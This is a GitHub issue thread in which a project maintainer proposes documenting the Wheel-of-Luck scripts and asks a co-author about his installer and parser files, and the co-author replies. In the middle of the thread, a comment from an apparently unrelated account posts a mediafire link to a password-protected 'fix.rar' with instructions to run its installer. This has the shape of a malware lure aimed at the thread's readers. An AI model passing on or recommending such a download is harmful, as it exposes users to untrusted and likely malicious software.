### ISSUE TITLE
Unite the scripts documentation.

### ISSUE THREAD

**Issue by Teg3z** [Teg3z/Wheel-of-Luck#19]
Im currently working on making an actual documentation for every script in this projects regarding #15. See:

- [63fdef0](https://github.com/Teg3z/Wheel-of-Luck/commit/63fdef0ed7b5a45b4f91b0bd6cb14f407f1f239d) 

I know I should have done a special documentation branch for it, but i was on a roll in the [feature/game-players-logic-change](https://github.com/Teg3z/Wheel-of-Luck/tree/feature/game-players-logic-change) branch as I have changed basically the whole code there except the UI.

Last script that I will document is the main [wheel_of_luck.py](https://github.com/Teg3z/Wheel-of-Luck/blob/feature/game-players-logic-change/wheel_of_luck.py) file. Will do that tomorrow.

This issue is about @R4tmax files, specifically: [installer.py](https://github.com/Teg3z/Wheel-of-Luck/blob/feature/game-players-logic-change/installer.py) and [multi_entry_col_parser.py](https://github.com/Teg3z/Wheel-of-Luck/blob/feature/game-players-logic-change/multi_entry_col_parser.py). Since, you mister, are the author of these files I wanted to ask you whether you want to document these files (in style as in [63fdef0](https://github.com/Teg3z/Wheel-of-Luck/commit/63fdef0ed7b5a45b4f91b0bd6cb14f407f1f239d)) yourself or shall I do that. So let me know.

Anyway after I document the main file Im gonna create a PR of the big [feature/game-players-logic-change](https://github.com/Teg3z/Wheel-of-Luck/tree/feature/game-players-logic-change) branch.

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by R4tmax** [comment]
Dont worry about the installer @Teg3z , wont be (and shouldnt be) supported longterm. 

Multicol parser seems okayish from my part, but if you want to modify it, feel free.
